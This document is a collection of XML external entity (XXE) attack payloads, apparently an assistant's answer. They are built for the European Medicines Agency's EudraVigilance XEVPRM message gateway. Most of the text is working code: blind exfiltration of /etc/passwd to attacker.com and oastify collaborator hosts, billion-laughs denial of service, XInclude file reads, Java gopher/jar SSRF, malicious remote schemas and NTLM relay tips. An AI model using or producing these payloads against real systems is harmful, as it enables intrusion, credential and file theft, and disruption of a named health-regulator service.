1. Basic XXE for Local File Read (Out-of-Band)
This is the most effective way to test if the parser resolves external entities. Since you likely won't see the output in the response, use a collaborator or webhook to check for a DNS or HTTP interaction.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
  <!ENTITY % exe SYSTEM "http://your-collaborator-url.com/a">
  %exe;
]>
<evprm xmlns="http://eudravigilance.ema.europa.eu/schema/emaxevmpd" ...>
<ichicsrmessageheader>
<messagetype>XEVPRM</messagetype>
<messagenumb>&exe;</messagenumb>
...
</ichicsrmessageheader>
</evprm>

===============================================
2. Blind XXE via Parameter Entities
If the parser blocks general entities in the body, try using parameter entities within the DTD. This is often used to exfiltrate files like /etc/passwd or C:/Windows/win.ini.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
  %eval;
  %error;
]>
<evprm xmlns="http://eudravigilance.ema.europa.eu/schema/emaxevmpd">
<ichicsrmessageheader>
<messagetype>XEVPRM</messagetype>
...
</ichicsrmessageheader>
</evprm>

==========================================
3. XML Entity Expansion (Billion Laughs)
To test for Denial of Service (DoS) vulnerabilities, you can use nested entities. If the server hangs or returns a 500 error after a long delay, it likely isn't limiting entity expansion.


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<evprm xmlns="http://eudravigilance.ema.europa.eu/schema/emaxevmpd">
<ichicsrmessageheader>
<messagetype>&lol9;</messagetype>
...
</ichicsrmessageheader>
</evprm>

==========================================================
4. XInclude Injection
Sometimes DOCTYPE is disabled, but XInclude is enabled. This can be used to include local files or trigger SSRF.

<?xml version="1.0" encoding="UTF-8"?>
<evprm xmlns="http://eudravigilance.ema.europa.eu/schema/emaxevmpd" xmlns:xi="http://www.w3.org/2001/XInclude">
<ichicsrmessageheader>
<messagetype>
  <xi:include parse="text" href="file:///etc/passwd"/>
</messagetype>
...
</ichicsrmessageheader>
</evprm>
When testing these, focus on injecting into tags that are likely to be processed or echoed back, such as messagesenderidentifier or messagenumb. If you're targeting the SharePoint environment mentioned in your notes, keep an eye out for NTLM relay opportunities by pointing the SYSTEM entity to a listener you control.

===============================================================

5. Java-Specific netdoc and jar Protocol Exploitation
If the backend is Java (common for EMA gateways), you can use protocols that are often left enabled in older Java XML parsers.

Java netdoc (Alternative for file read):

<!DOCTYPE r [<!ENTITY xxe SYSTEM "netdoc:///etc/passwd">]>
<evprm ...>&xxe;</evprm>

Java jar Protocol (File existence/extraction): This can be used to pull files out of compressed archives on the server or to see if specific JARs/WARs are present.

<!DOCTYPE r [<!ENTITY xxe SYSTEM "jar:http://attacker.com/file.zip!/file.txt">]>

====================================================================
6. Blind XXE via Gopher (SSRF)
If the system is older Java, the gopher:// protocol might be available. This is extremely powerful because it allows you to construct raw TCP packets (like sending a GET/POST to another internal service or even interacting with Redis/Memcached).

<!DOCTYPE r [<!ENTITY xxe SYSTEM "gopher://internal-service:port/_RAW_DATA">]>

========================================================================
7. XML External DTD with Error-Based Exfiltration
Since you likely won't get a response with data, you can try to force the server to throw an error message that contains the content of the file you want.

External DTD (error.dtd):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%exfil;
Main Payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [%wrapper SYSTEM "http://attacker.com/error.dtd"> %wrapper;]>
<evprm ...>
...
</evprm>

========================================================================
8. Overriding the Schema for Validation Attacks
Since the XML uses xsi:schemaLocation, you can try to point the schema to a massive file or a circular reference on your own server. Some parsers will download and exhaust memory/CPU attempting to validate the document against a malicious schema.

<evprm xmlns="http://eudravigilance.ema.europa.eu/schema/emaxevmpd" 
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://eudravigilance.ema.europa.eu/schema/emaxevmpd http://attacker.com/large_malicious.xsd">

========================================================================
9. Soap-style XXE (if it's a SOAP gateway)
If this XML is actually being wrapped in a SOAP envelope before being sent to the internal ENS, you can target the header or body of the SOAP message itself.

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <foo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="... http://attacker.com/xxe.xsd"/>
  </soapenv:Header>
  <soapenv:Body>
      [The XEVPRM payload here]
  </soapenv:Body>
</soapenv:Envelope>
Since the target is an ENS (Early Notification System), look for fields that might trigger a notification email or dashboard update. If those fields are vulnerable, the data you exfiltrate via XXE might show up in a notification sent to an administrator.

=========================================================================

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://your-collaborator.oastify.com/?data=%file;'>">
  %eval;
  %exfil;
]>
<evprm xmlns="http://eudravigilance.ema.europa.eu/schema/emaxevmpd">
<ichicsrmessageheader>
<messagetype>XEVPRM</messagetype>
<messageformatversion>2</messageformatversion>
<messageformatrelease>0</messageformatrelease>
<messagenumb>123</messagenumb>
<messagesenderidentifier>SCHWARZIR_U</messagesenderidentifier>
<messagereceiveridentifier>EVHUMAN</messagereceiveridentifier>
<messagedateformat>204</messagedateformat>
<messagedate>20260506132247</messagedate>
</ichicsrmessageheader>
</evprm>
Note: If /etc/passwd contains spaces or special characters, Java's SYSTEM entity might fail. Try something simpler first like file:///etc/hostname.
==================================================

<evprm xmlns="http://eudravigilance.ema.europa.eu/schema/emaxevmpd"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://eudravigilance.ema.europa.eu/schema/emaxevmpd http://your-collaborator.oastify.com/test.xsd">

======================================================

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
  <!ENTITY % xxe SYSTEM "http://your-id.oastify.com/test">
  %xxe;
]>
<evprm xmlns="http://eudravigilance.ema.europa.eu/schema/emaxevmpd">
<ichicsrmessageheader>
<messagetype>XEVPRM</messagetype>
...
</ichicsrmessageheader>
</evprm>

=========================================================

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
  %eval;
  %error;
]>
<evprm xmlns="http://eudravigilance.ema.europa.eu/schema/emaxevmpd">
<ichicsrmessageheader>
<messagetype>XEVPRM</messagetype>
...
</ichicsrmessageheader>
</evprm>
